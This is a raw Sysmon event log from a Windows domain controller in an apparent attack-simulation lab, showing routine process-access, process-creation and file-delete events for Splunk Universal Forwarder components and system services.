14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205334Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205333Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205332Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205331Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205330Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205329Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205328Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205327Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3b54b|c:\windows\system32\rpcss.dll+3a39a|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205326Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.963{2E1864BB-E13E-6299-0D00-000000005F02}912932C:\Windows\system32\svchost.exe{2E1864BB-FA2C-6299-4D07-000000005F02}3376C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+2db91|c:\windows\system32\rpcss.dll+3a274|c:\windows\system32\rpcss.dll+2b9ce|c:\windows\system32\rpcss.dll+2a8d3|c:\windows\system32\rpcss.dll+462b6|c:\windows\system32\rpcss.dll+46762|c:\windows\system32\rpcss.dll+4906f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000205325Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.832{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93F0CA106FBA0A33B7E4223179703CB5,SHA256=15E0E81ECCC276B128C5674B9A46AFD1599E9453E836071832205A139A75CD2B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205324Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-182A-629A-4E42-000000005F02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205323Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205322Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205321Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205320Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205319Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-182A-629A-4E42-000000005F02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205318Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.778{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-182A-629A-4E42-000000005F02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205317Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.779{2E1864BB-182A-629A-4E42-000000005F02}7144C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205316Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.478{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B20F0F407E00D2D54C0EB74CD1E14D24,SHA256=19378EFB28B2197CF6D1DFFA785F486DFBAB9AC52335D9EFD8845096DD5D7B81,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205315Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.406{2E1864BB-182A-629A-4D42-000000005F02}17161240C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205314Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-182A-629A-4D42-000000005F02}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205313Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205312Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205311Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205310Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205309Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-182A-629A-4D42-000000005F02}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000205308Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.100{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-182A-629A-4D42-000000005F02}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000205307Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:18.101{2E1864BB-182A-629A-4D42-000000005F02}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000205378Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.898{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA9933079DF55E246EF35E410DE7975A,SHA256=3E68C5701266F17139A652BF3938AC38C933BA9B7B7B1BCD987B277E81040505,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000205377Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:18:19.851{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-182B-629A-5042-000000005F02}1432C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000205376Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 